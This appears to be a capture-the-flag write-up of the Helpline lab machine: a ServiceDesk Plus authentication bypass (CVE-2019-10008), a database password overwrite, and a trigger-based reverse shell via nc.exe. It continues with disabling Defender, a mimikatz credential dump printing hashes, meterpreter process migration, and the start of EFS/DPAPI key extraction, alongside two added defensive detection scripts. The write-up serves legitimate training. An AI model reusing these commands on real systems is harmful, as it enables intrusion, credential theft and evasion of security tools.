There’s a completely alternative path through Helpline that involves getting a shell as SYSTEM from ServiceDesk Plus. However, because the flag files are encrypted, there’s still some work to do. This is why the root blood came before the user blood. I’ll pick up here, most importantly having found the mobile client vulnerability in SDP. I’ll show an alternative path to SYSTEM shell via the Postgres database as well.

Shell as SYSTEM

SDP Privesc

CVE-2019-10008 /mc

There’s another exploit that was developed by a team working on Helpline (the POC video is clearly against Helpline). I downloaded the script from exploit-db, and I changed the host from localhost to I also had to add # -*- coding: utf-8 -*- as the second line to handle the characters in the authors’ names.

On running, it dumps out cookies for an admin login:

root@kali# ./cve-2019-10008.py 
User with low priv: guest:guest
User to bypass authentication to: administrator
Getting a session id
Logging in with low privilege user
Captured authenticated cookies.
Captured secondary sessid.
Doing the magic step 1.
Doing the magic step 2.
Captured target session.Set following cookies on your browser.

I’ll take the five lines at the bottom and set each of those as cookies using the cookie plugin in my browser. When I refresh on the root url, I’m logged in as admin:


Looking at the script, it’s basically taking advantage of /mc. In SDP, visiting /mc takes the user to the mobile client login. It is a different app, but with some shared architecture. This path presents a different login page:


If I try to log in with the default administrator creds on the main page or the mobile page, it fails. However, if I log in as guest, then switch to /mc, then logout, then give administrator / anything, I’ll be logged in as admin, even when I switch back to the non-mobile site:

Change administrator Password

An alternative to the two exploits above is to use my shell as alice and postgres access to change the administrator password for SDP.

The database here is a mess. To get a list of usernames and password hashes, I’ll do a join on the aaapassword and aaalogin tables:

PS helpline\alice@HELPLINE bin> ./psql.exe -h -p 65432 -U postgres -w -d servicedesk -c "select aaapassword.password_id, aaalogin.name from aaalogin, aaapassword where aaalogin.login_id = aaapassword.password_id "
 password_id |     name      
           1 | guest
           2 | administrator
         302 | luis_21465
         303 | zachary_33258
         601 | stephen
         602 | fiona
         603 | mary
         604 | anne
(8 rows)

All I need to do is overwrite the password entries for id 2. The aaapassword table currently shows:

PS helpline\alice@HELPLINE bin> ./psql.exe -h -p 65432 -U postgres -w -d servicedesk -c "select * from aaapassword;"
 password_id |                           password                           | algorithm |             salt              | passwdprofile_id | passwdrule_id |  createdtime  | factor 
           1 | $2a$12$6VGARvoc/dRcRxOckr6WmucFnKFfxdbEMcJvQdJaS5beNK0ci0laG | bcrypt    | $2a$12$6VGARvoc/dRcRxOckr6Wmu |                2 |             1 | 1545350288006 |     12
         302 | $2a$12$2WVZ7E/MbRgTqdkWCOrJP.qWCHcsa37pnlK.0OyHKfd4lyDweMtki | bcrypt    | $2a$12$2WVZ7E/MbRgTqdkWCOrJP. |                2 |             1 | 1545428506907 |       
         303 | $2a$12$Em8etmNxTinGuub6rFdSwubakrWy9BEskUgq4uelRqAfAXIUpZrmm | bcrypt    | $2a$12$Em8etmNxTinGuub6rFdSwu |                2 |             1 | 1545428808687 |       
           2 | $2a$12$hmG6bvLokc9jNMYqoCpw2Op5ji7CWeBssq1xeCmU.ln/yh0OBPuDa | bcrypt    | $2a$12$hmG6bvLokc9jNMYqoCpw2O |                2 |             1 | 1545428960671 |     12
         601 | $2a$12$6sw6V2qSWANP.QxLarjHKOn3tntRUthhCrwt7NWleMIcIN24Clyyu | bcrypt    | $2a$12$6sw6V2qSWANP.QxLarjHKO |                2 |             1 | 1545514864248 |       
         602 | $2a$12$X2lV6Bm7MQomIunT5C651.PiqAq6IyATiYssprUbNgX3vJkxNCCDa | bcrypt    | $2a$12$X2lV6Bm7MQomIunT5C651. |                2 |             1 | 1545515091170 |       
         603 | $2a$12$gFZpYK8alTDXHPaFlK51XeBCxnvqSShZ5IO/T5GGliBGfAOxwHtHu | bcrypt    | $2a$12$gFZpYK8alTDXHPaFlK51Xe |                2 |             1 | 1545516114589 |       
         604 | $2a$12$4.iNcgnAd8Kyy7q/mgkTFuI14KDBEpMhY/RyzCE4TEMsvd.B9jHuy | bcrypt    | $2a$12$4.iNcgnAd8Kyy7q/mgkTFu |                2 |             1 | 1545517215465 |       
(8 rows)

I could go setting my own password, but it seems easier just to copy one I already know, like guest. My first attempt failed:

PS helpline\alice@HELPLINE bin> ./psql.exe -h -p 65432 -U postgres -w -d servicedesk -c "update aaapassword set password='$2a$12$6VGARvoc/dRcRxOckr6WmucFnKFfxdbEMcJvQdJaS5beNK0ci0laG', salt='$2a$12$6VGARvoc/dRcRxOckr6Wmu' where password_id = 2;"
PS helpline\alice@HELPLINE bin> ./psql.exe -h -p 65432 -U postgres -w -d servicedesk -c "select * from aaapassword where password_id = 2;"
 password_id |                   password                    | algorithm |      salt      | passwdprofile_id | passwdrule_id |  createdtime  | factor 
           2 | /dRcRxOckr6WmucFnKFfxdbEMcJvQdJaS5beNK0ci0laG | bcrypt    | /dRcRxOckr6Wmu |                2 |             1 | 1545428960671 |     12
(1 row)

$ has meaning in postgres, and therefore I’ve got to figure out how to escape it. This was trickier than I expected (thanks to jkr and snowscan for tips here). One way to do it is use a unicode string, replacing '$2a$12$6VGARvoc/dRcRxOckr6Wmu' with U&'\00242a\002412\00246VGARvoc/dRcRxOckr6Wmu'. Another is to use backtick to escape, so '`$2a`$12`$6VGARvoc/dRcRxOckr6Wmu'.

I can rerun and it works:

PS helpline\alice@HELPLINE bin> ./psql.exe -h -p 65432 -U postgres -w -d servicedesk -c "update aaapassword set password='`$2a`$12`$6VGARvoc/dRcRxOckr6WmucFnKFfxdbEMcJvQdJaS5beNK0ci0laG', salt='`$2a`$12`$6VGARvoc/dRcRxOckr6Wmu' where password_id = 2;"

PS helpline\alice@HELPLINE bin> ./psql.exe -h -p 65432 -U postgres -w -d servicedesk -c "select password_id, password, salt from aaapassword where password_id = 1 or password_id = 2;"
 password_id |                           password                           |             salt              
           1 | $2a$12$6VGARvoc/dRcRxOckr6WmucFnKFfxdbEMcJvQdJaS5beNK0ci0laG | $2a$12$6VGARvoc/dRcRxOckr6Wmu
           2 | $2a$12$6VGARvoc/dRcRxOckr6WmucFnKFfxdbEMcJvQdJaS5beNK0ci0laG | $2a$12$6VGARvoc/dRcRxOckr6Wmu
(2 rows)

Now I’m able to login using administrator / guest.
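
A defender's view of the same table, as an added example (not from the original post and not ServiceDesk Plus code): it parses psql output in the layout shown above and flags rows that share a hash with another account, rows whose salt column is not the prefix of the password column, and rows that are not well-formed bcrypt strings, which is what the failed first update left behind. The sample rows are constructed and the function names are hypothetical.

```python
import re
from collections import defaultdict

# bcrypt string: $2a$/$2b$/$2y$, two-digit cost, then 22 salt + 31 digest characters
BCRYPT_RE = re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$")
SALT_LEN = 29  # "$2a$12$" plus the 22-character salt, as stored in the salt column


def parse_psql_table(text):
    """Turn psql's aligned output into a list of dicts keyed by column name."""
    lines = [l for l in text.splitlines() if "|" in l]  # skips the rule and "(N rows)"
    header = [h.strip() for h in lines[0].split("|")]
    return [dict(zip(header, (c.strip() for c in l.split("|")))) for l in lines[1:]]


def audit_password_rows(rows):
    """Return sorted (password_id, finding) pairs for suspicious rows."""
    findings, by_hash = [], defaultdict(list)
    for row in rows:
        pid, pw, salt = int(row["password_id"]), row["password"], row["salt"]
        if not BCRYPT_RE.match(pw):
            # e.g. a value whose "$..." parts were lost before it reached the database
            findings.append((pid, "malformed-hash"))
            continue
        if pw[:SALT_LEN] != salt:
            findings.append((pid, "salt-mismatch"))
        by_hash[pw].append(pid)
    # bcrypt salts are random per password, so two accounts with the same
    # salt and digest means one row was copied from the other
    for pids in by_hash.values():
        if len(pids) > 1:
            findings.extend((pid, "shared-hash") for pid in pids)
    return sorted(findings)


def fake_bcrypt(salt_char, digest_char):
    """Constructed placeholder with the right shape; not a real hash."""
    return "$2a$12$" + salt_char * 22 + digest_char * 31


def row(pid, pw, salt):
    return f" {pid:>11} | {pw:<60} | bcrypt    | {salt}"


GUEST = fake_bcrypt("A", "a")
OTHER = fake_bcrypt("B", "b")
# Constructed sample in the same layout as the psql output on this page
SAMPLE = "\n".join([
    " password_id | password | algorithm | salt",
    "-------------+----------+-----------+------",
    row(1, GUEST, GUEST[:SALT_LEN]),
    row(2, GUEST, GUEST[:SALT_LEN]),            # copy of row 1
    row(302, OTHER, OTHER[:SALT_LEN]),          # clean row
    row(303, "/" + "C" * 44, "/" + "C" * 14),   # truncated value, not bcrypt
    row(601, fake_bcrypt("D", "d"), fake_bcrypt("E", "e")[:SALT_LEN]),
    "(5 rows)",
])

if __name__ == "__main__":
    for pid, finding in audit_password_rows(parse_psql_table(SAMPLE)):
        print(pid, finding)
```
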

Create Trigger

With admin access to SDP, I can access everything I could access before as guest. But now I can also use triggers to get a shell.

On the “Admin” page, there’s a link to “Custom Triggers”. I’ll click “Add New Action”, and fill out the form:


My script file to run is:

cmd /c powershell iwr -uri -outfile c:\windows\system32\spool\drivers\color\nc.exe; c:\windows\system32\spool\drivers\color\nc.exe -e cmd.exe 443

Now I’ll go back to the main window, and create a new high priority ticket. Once it saves, I see the request for nc on my python web server:

 - - [12/Aug/2019 16:52:18] "GET /nc64.exe HTTP/1.1" 200 -

And then I have a shell as SYSTEM:

root@kali# rlwrap nc -lnvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
Microsoft Windows [Version 10.0.17763.253]
(c) 2018 Microsoft Corporation. All rights reserved.

nt authority\system

Get administrator Password


As system, it may seem like this box is over, but it’s not. When I go to get root.txt, I can’t access it:

c:\Users\Administrator\Desktop>type root.txt
Access is denied.

I can use cipher to see more details about why:

c:\Users\Administrator\Desktop>cipher /c root.txt
cipher /c root.txt

 Listing c:\Users\Administrator\Desktop\
 New files added to this directory will not be encrypted.

E root.txt
  Compatibility Level:
    Windows XP/Server 2003

  Users who can decrypt:
    HELPLINE\Administrator [Administrator(Administrator@HELPLINE)]
    Certificate thumbprint: FB15 4575 993A 250F E826 DBAC 79EF 26C2 11CB 77B3 

  No recovery certificate found.

  Key information cannot be retrieved.

The specified file could not be decrypted.

The file is encrypted with EFS, and since SYSTEM doesn’t know the password for administrator, it can’t access the file. It actually turns out that all of the critical files on Helpline are encrypted with EFS.

Upload Mimikatz

I’ll need mimikatz to get the necessary bits to decrypt the file. I’ll download the latest release and get the x64 exe out of the zip.

Now I’ll bring it to Helpline:

c:\Windows\System32\spool\drivers\color>powershell iwr -uri -outfile m.exe

c:\Windows\System32\spool\drivers\color>dir m.exe
 Volume in drive C has no label.
 Volume Serial Number is D258-5C3B

 Directory of c:\Windows\System32\spool\drivers\color

08/12/2019  09:06 PM         1,011,864 m.exe
               1 File(s)      1,011,864 bytes
               0 Dir(s)   5,844,955,136 bytes free

But when I try to run it, it’s gone:

The system cannot execute the specified program.

Defender is quarantining it. Since I’m SYSTEM, I’ll just disable Defender:

c:\>powershell Set-MpPreference -DisableRealtimeMonitoring $true

Now it can run:

c:\Windows\System32\spool\drivers\color>powershell iwr -uri -outfile m.exe


  .#####.   mimikatz 2.2.0 (x64) #18362 Jul 20 2019 22:57:37
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # 
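
The two behaviours in this section, turning off Defender real-time monitoring and running a binary out of spool\drivers\color, are both visible in process-creation logs. The following is an added example, not part of the original post: it flags each one and raises the severity when a binary in that directory is referenced shortly after protection was disabled. The log records, the URL in them and the rule names are constructed.

```python
import re
from datetime import datetime, timedelta

# Set-MpPreference turning real-time monitoring off. PowerShell accepts
# unambiguous parameter-name prefixes, so match from "-DisableRea" onward.
TAMPER_RE = re.compile(
    r"set-mppreference\b.*-disablerea[a-z]*[\s:]+(?:\$true|1)\b", re.I)

# A script or binary referenced inside the colour-profile directory used on this page
STAGING_RE = re.compile(
    r'\\windows\\system32\\spool\\drivers\\color\\[^\\\s"]+\.(?:exe|dll|ps1|bat)\b',
    re.I)

# Constructed process-creation records: (timestamp, user, command line)
EVENTS = [
    ("2019-08-12 21:06:01", "NT AUTHORITY\\SYSTEM",
     r"powershell iwr -uri http://198.51.100.7/m.exe "
     r"-outfile c:\windows\system32\spool\drivers\color\m.exe"),
    ("2019-08-12 21:07:30", "NT AUTHORITY\\SYSTEM",
     r"powershell Set-MpPreference -DisableRealtimeMonitoring $true"),
    ("2019-08-12 21:08:02", "NT AUTHORITY\\SYSTEM",
     r"c:\Windows\System32\spool\drivers\color\m.exe"),
    ("2019-08-12 21:09:00", "HELPLINE\\leo",
     r"C:\Windows\System32\notepad.exe notes.txt"),
    ("2019-08-12 21:10:00", "NT AUTHORITY\\SYSTEM",
     r"powershell Set-MpPreference -DisableRealtimeMonitoring $false"),
]


def detect(events, window=timedelta(minutes=10)):
    """Return (timestamp, rule, severity) alerts in chronological order."""
    alerts, last_tamper = [], None
    for ts, _user, cmd in sorted(events):
        when = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        if TAMPER_RE.search(cmd):
            last_tamper = when
            alerts.append((ts, "defender-rtp-disabled", "medium"))
        if STAGING_RE.search(cmd):
            # Escalate when this follows a Defender change inside the window
            chained = last_tamper is not None and when - last_tamper <= window
            alerts.append((ts, "color-dir-binary", "high" if chained else "medium"))
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(*alert)
```

Defender also records event 5001 in its Operational log when real-time protection is turned off, which catches the change even where command lines are not logged.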

Fix Issue With Version

The first thing I wanted to do was dump out passwords. If I can find the admin password, I could just connect with that. I started to run sekurlsa::logonpasswords, but it failed:

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import  

Some googling shows this is a known and recent issue. I grabbed one version older from the releases page, uploaded it as m2.exe, and it works:

mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 212681 (00000000:00033ec9)
Session           : Interactive from 1
User Name         : leo
Domain            : HELPLINE
Logon Server      : HELPLINE
Logon Time        : 8/12/2019 6:58:42 PM
SID               : S-1-5-21-3107372852-1132949149-763516304-1009
        msv :
         [00000003] Primary
         * Username : leo
         * Domain   : HELPLINE
         * NTLM     : 60b05a66232e2eb067b973c889b615dd
         * SHA1     : 68c6608505d867762620a64dfd354685da822bf2
        tspkg :
        wdigest :
         * Username : leo
         * Domain   : HELPLINE
         * Password : (null)
        kerberos :
         * Username : leo
         * Domain   : HELPLINE
         * Password : (null)
        ssp :
        credman :

If I’m lucky enough to be doing this box at the same time as someone else who has taken the intended path, there are likely administrator credentials in memory as well, and I can proceed to decrypt root.txt. In that case, I’d see the following in the results from the previous command:

Authentication Id : 0 ; 3468015 (00000000:0034eaef)
Session           : NetworkCleartext from 0
User Name         : Administrator
Domain            : HELPLINE
Logon Server      : HELPLINE
Logon Time        : 8/17/2019 3:31:21 PM
SID               : S-1-5-21-3107372852-1132949149-763516304-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : HELPLINE
         * NTLM     : d5312b245d641b3fae0d07493a022622
         * SHA1     : 6148ba9dcbb1567b1c83606747dc7cfed0243dde
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : HELPLINE
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : HELPLINE
         * Password : (null)
        ssp :
        credman :

But on a fresh box, there’s only leo’s sha1 here. I could dump hashes from the registry using lsadump::sam, but those would only be NTLM hashes, and won’t work on a local account.

More Enumeration

Some basic enumeration of the various user directories does reveal admin-pass.xml on leo’s desktop.

C:\Users\leo\Desktop>dir /b

I still can’t access it as SYSTEM:

C:\Users\leo\Desktop>type admin-pass.xml
type admin-pass.xml
Access is denied.

That’s an interesting file, and I have leo’s sha1 from sekurlsa::logonpasswords, which means that the user is logged in in some sense.

Load Meterpreter

At this point, I’m going to take a shot at reading the password file without decrypting it, by injecting into a process running as leo. Since leo’s info was in the logonpasswords, there’s a chance there’s a process running as leo.

I’ll build a payload with msfvenom:

root@kali# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe -o met_10.10.14.14-4444.exe                                                                
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: met_10.10.14.14-4444.exe

I’ll share it over smb and run it:

C:\>net use \\\share /u:df df
The command completed successfully.

And I get a session in metasploit:

msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on
[*] Sending stage (206403 bytes) to
[*] Meterpreter session 1 opened ( -> at 2019-08-17 10:03:06 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Inject into leo

There are a few processes running as leo, including explorer.exe:

meterpreter > ps -U leo
Filtering on user 'leo'

Process List

 PID   PPID  Name                     Arch  Session  User          Path
 ---   ----  ----                     ----  -------  ----          ----
 608   700   conhost.exe              x64   1        HELPLINE\leo  C:\Windows\System32\conhost.exe
 700   5280  powershell.exe           x64   1        HELPLINE\leo  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe                                                                                               
 2568  836   ctfmon.exe               x64   1        HELPLINE\leo  C:\Windows\System32\ctfmon.exe
 4700  1796  sihost.exe               x64   1        HELPLINE\leo  C:\Windows\System32\sihost.exe
 4720  596   svchost.exe              x64   1        HELPLINE\leo  C:\Windows\System32\svchost.exe
 4756  596   svchost.exe              x64   1        HELPLINE\leo  C:\Windows\System32\svchost.exe
 4812  1360  taskhostw.exe            x64   1        HELPLINE\leo  C:\Windows\System32\taskhostw.exe
 5280  5260  explorer.exe             x64   1        HELPLINE\leo  C:\Windows\explorer.exe
 5296  5280  vmtoolsd.exe             x64   1        HELPLINE\leo  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe                                                                                                       
 5524  740   ShellExperienceHost.exe  x64   1        HELPLINE\leo  C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe                                                                         
 5620  740   SearchUI.exe             x64   1        HELPLINE\leo  C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe                                                                              
 5780  740   RuntimeBroker.exe        x64   1        HELPLINE\leo  C:\Windows\System32\RuntimeBroker.exe
 5852  740   RuntimeBroker.exe        x64   1        HELPLINE\leo  C:\Windows\System32\RuntimeBroker.exe
 6076  740   RuntimeBroker.exe        x64   1        HELPLINE\leo  C:\Windows\System32\RuntimeBroker.exe

I’ll migrate into explorer:

meterpreter > migrate 5280
[*] Migrating from 4192 to 5280...
[*] Migration completed successfully.

Now I’ll load powershell and get a shell as leo:

meterpreter > load powershell 
Loading extension powershell...Success.
meterpreter > powershell_shell 
PS > whoami

Now I can read admin-pass.xml:

PS > type admin-pass.xml

Get Password

Now I’ll get the password from that file:

PS > $s = cat admin-pass.xml
PS > $ss = Convertto-securestring -string $s
PS > $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist "administrator", $ss
PS > $cred.GetNetworkCredential().password

Read root.txt

Via PowerShell

The easiest way forward is to use the credential ($cred) I created in the last step to run commands:

PS > Invoke-Command -ScriptBlock { whoami } -Credential $cred -Computer localhost 

I can try to read the flag:

PS > Invoke-Command -ScriptBlock { type C:\users\administrator\desktop\root.txt } -Credential $cred -Computer localhost
ERROR: Access to the path 'C:\Users\Administrator\desktop\root.txt' is denied.
ERROR:     + CategoryInfo          : PermissionDenied: (C:\Users\Administrator\desktop\root.txt:String) [Get-Content], Unauth
ERROR:    orizedAccessException
ERROR:     + FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
ERROR:     + PSComputerName        : localhost

That doesn’t get around the EFS… but if I use -auth CredSSP, just like over WinRM:

PS > Invoke-Command -ScriptBlock { type C:\users\administrator\desktop\root.txt } -Credential $cred -Computer localhost -auth credssp

Decrypt EFS


The more interesting path is to decrypt the EFS file. I’m going to follow this guide from the Mimikatz GitHub.

Get The Certificate

I’ll start with the output of cipher run above. That tells me that the certificate thumbprint is: FB15 4575 993A 250F E826 DBAC 79EF 26C2 11CB 77B3. That means according to the guide, I should find it in C:\Users\administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates, and I do:

C:\Users\Administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates>dir /a /b

Note that I’m using dir /a, as all of these files and directories are hidden, and it will look like there’s nothing there without the /a. I’m also using /b to give compressed output.
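
The lookup above, from cipher /c output to the certificate file named after the thumbprint, can be scripted when auditing which key protects each EFS file and whether a recovery agent exists. This is an added example, not from the original post; the listing is copied from the cipher output earlier on this page, and the "Recovery Certificates" heading and the assumption that the profile folder matches the account name are mine.

```python
import re
from pathlib import PureWindowsPath

# cipher /c listing as shown earlier on this page
SAMPLE = r"""
 Listing c:\Users\Administrator\Desktop\
 New files added to this directory will not be encrypted.

E root.txt
  Compatibility Level:
    Windows XP/Server 2003

  Users who can decrypt:
    HELPLINE\Administrator [Administrator(Administrator@HELPLINE)]
    Certificate thumbprint: FB15 4575 993A 250F E826 DBAC 79EF 26C2 11CB 77B3

  No recovery certificate found.
"""

FILE_RE = re.compile(r"^([EU]) (\S.*)$")       # E = encrypted, U = unencrypted
ACCOUNT_RE = re.compile(r"^(.+?) \[.*\]$")     # DOMAIN\user [display(upn)]


def parse_cipher_listing(text):
    """Parse cipher /c output into one dict per listed file."""
    files, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        m = FILE_RE.match(raw)
        if m:
            cur = {"name": m.group(2).strip(), "encrypted": m.group(1) == "E",
                   "users": [], "recovery": []}
            files.append(cur)
            section = None
        elif cur is None or not line:
            continue
        elif line == "Users who can decrypt:":
            section = "users"
        elif line.startswith("Recovery Certificates"):  # assumed heading text
            section = "recovery"
        elif line == "No recovery certificate found.":
            section = None
        elif section and line.startswith("Certificate thumbprint:") and cur[section]:
            thumb = re.sub(r"\s+", "", line.split(":", 1)[1]).upper()
            if re.fullmatch(r"[0-9A-F]{40}", thumb):    # SHA-1 thumbprint
                cur[section][-1]["thumbprint"] = thumb
        elif section and (m := ACCOUNT_RE.match(line)):
            cur[section].append({"account": m.group(1), "thumbprint": None})
    return files


def user_cert_path(account, thumbprint, users_root=r"C:\Users"):
    """Path of the certificate file in the user's My store.

    Assumes the profile folder is named after the account, as on this host.
    """
    user = account.split("\\")[-1]
    return str(PureWindowsPath(users_root, user, "AppData", "Roaming", "Microsoft",
                               "SystemCertificates", "My", "Certificates", thumbprint))


def efs_report(text):
    """Summarise each encrypted file: who can decrypt it and with which cert file."""
    report = []
    for f in parse_cipher_listing(text):
        if not f["encrypted"]:
            continue
        report.append({
            "file": f["name"],
            "decryptors": [u["account"] for u in f["users"]],
            "cert_files": [user_cert_path(u["account"], u["thumbprint"])
                           for u in f["users"] if u["thumbprint"]],
            "recovery_agent": bool(f["recovery"]),
        })
    return report


if __name__ == "__main__":
    for entry in efs_report(SAMPLE):
        print(entry)
```
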

Now I can use mimikatz to get info on the certificate:

mimikatz # crypto::system /file:"C:\Users\Administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\FB154575993A250FE826DBAC79EF26C211CB77B3" /export

* File: 'C:\Users\Administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\FB154575993A250FE826DBAC79EF26C211CB77B3'
  Provider info:
        Key Container  : 3dd3e213-bce6-4acb-808c-a1b3227ecbde
        Provider       : Microsoft Enhanced Cryptographic Provider v1.0
        Provider type  : RSA_FULL (1)
        Type           : AT_KEYEXCHANGE (0x00000001)
        Flags          : 00000000
        Param (todo)   : 00000000 / 00000000

[0003/1] SHA1_HASH_PROP_ID
[0020/1] cert_file_element
  Data: 30820314308201fca0030201020210194a705262024cab4094533eed3561f8300d06092a864886f70d01010505003018311630140603550403130d41646d696e6973747261746f723020170d3138313232333139353533345a180f32313138313132393139353533345a3018311630140603550403130d41646d696e6973747261746f7230820122300d06092a864886f70d01010105000382010f003082010a0282010100c33c505d59ea1dd47306b84f92833d5b33f9c6422a546368176de4b3dbbd29730192b43273ad98f3719d657176d7586e841bcb177d5e3275f092155c7c422180964a024d5d982982610860aec5525e58523d7633512b264de41a46ee7cd89c26a5a013f5a9fb1eed992f98c0ab5be241b1c796e74ba5924b7d074f15ee67534e089b86bc43d670832404fe63a9cdf5ccf84532ef8bf800597de0f4553785e516f91255be7cae47ba99cce2c1d2bda076074da0e66de4ec9e7bd4f67b49bcf896ba8f20554eeac4f28b0588378fd435dba1d4d5bd2667fa79a47835b9c834dbc0d65b067dd09ac49f31c5737665af8e3a66514135b3e5d482a7e66e7111b689390203010001a358305630150603551d25040e300c060a2b0601040182370a030430320603551d11042b3029a027060a2b060104018237140203a0190c1741646d696e6973747261746f724048454c504c494e450030090603551d1304023000300d06092a864886f70d01010505000382010100967ac2ac65fe0cb96583240be69e81173546a6d817951e338aa58d7c5e8f2b96c2af6c2a758800c086eb8cb55a525c4f85af2311ac6e655a7a071f719b5a776de45edc699bbd47bcb9b235595990bcf518d20635d297aa576b97932248414d2f1ac849d525379065f5f4c640cc9ebac0a2c240263c08ef4c54e9c9a6b08dd0cf4eb78e1d5e7341b1a950045c2d3233554aeff1294d300e0a5cf75eaf832b76c0fa96e7e3a4c28ddb639d366da1e0f3af91d678c22acd980890af1372f37954d503e133261a078a161d9cba85dd28b2ef0eebffb1b8ae0980c7978021b01fcf0dc5f282ab67be4540418b05a627b6b34b06bf5283b00efb3a32ae651e132eb3d3                                       
  Saved to file: FB154575993A250FE826DBAC79EF26C211CB77B3.der

I’ll need that certificate later. I’ll also continue knowing that the Key Container ID is 3dd3e213-bce6-4acb-808c-a1b3227ecbde.

About The Private Key

Now I’ll go digging into C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA to find the containers. There’s only one SID:

C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA>dir /a /b

In that dir, there is only one potential key container file:

C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3107372852-1132949149-763516304-500>dir /a /b

I’ll use mimikatz to get details. I want to make sure the pUniqueName matches the Key Container ID from above, and it does:

mimikatz # dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3107372852-1132949149-763516304-500\d1775a874937ca4b3cd9b8e334588333_86f90bf3-9d4c-47b0-bc79-380521b14c85"
**KEY (capi)**
  dwVersion          : 00000002 - 2
  dwUniqueNameLen    : 00000025 - 37
  dwSiPublicKeyLen   : 00000000 - 0
  dwSiPrivateKeyLen  : 00000000 - 0
  dwExPublicKeyLen   : 0000011c - 284
  dwExPrivateKeyLen  : 00000650 - 1616
  dwHashLen          : 00000014 - 20
  dwSiExportFlagLen  : 00000000 - 0
  dwExExportFlagLen  : 000000fc - 252
  pUniqueName        : 3dd3e213-bce6-4acb-808c-a1b3227ecbde
  pHash              : 0000000000000000000000000000000000000000
  pSiPublicKey       :
  pSiPrivateKey      :
  pSiExportFlag      :
  pExPublicKey       : 525341310801000000080000ff000000010001003989b611716ee6a782d4e5b3354151663a8eaf657673c5319fc49ad07d065bd6c0db34c8b93578a479fa6726bdd5d4a1db35d48f3788058bf2c4ea4e55208fba96f8bc497bf6d47b9eece46de6a04d0776a0bdd2c1e2cc99ba47ae7cbe5512f916e5853755f4e07d5900f88bef3245f8ccf5cda963fe04248370d643bc869b084e5367ee154f077d4b92a54be796c7b141e25babc0982f99ed1efba9f513a0a5269cd87cee461ae44d262b5133763d52585e52c5ae6008618229985d4d024a968021427c5c1592f075325e7d17cb1b846e58d77671659d71f398ad7332b492017329bddbb3e46d176863542a42c6f9335b3d83924fb80673d41dea595d503cc30000000000000000                                                                                                                                                                        
  pExPrivateKey      :
    dwVersion          : 00000001 - 1
    guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
    dwMasterKeyVersion : 00000001 - 1
    guidMasterKey      : {9e78687d-d881-4ccb-8bd8-bc0a19608687}
    dwFlags            : 00000000 - 0 ()
    dwDescriptionLen   : 0000002c - 44
    szDescription      : CryptoAPI Private Key
    algCrypt           : 00006610 - 26128 (CALG_AES_256)
    dwAlgCryptLen      : 00000100 - 256
    dwSaltLen          : 00000020 - 32
    pbSalt             : 636d94346c64834703f72ac073d477dfbf956804655e17c6f37e2865deb4d1f9
    dwHmacKeyLen       : 00000000 - 0
    pbHmackKey         :
    algHash            : 0000800e - 32782 (CALG_SHA_512)
    dwAlgHashLen       : 00000200 - 512
    dwHmac2KeyLen      : 00000020 - 32
    pbHmack2Key        : 168bc09c733e929c54210737b2a287fbbbb4addfd2fd9e9de5768ed1a03162e4
    dwDataLen          : 00000550 - 1360
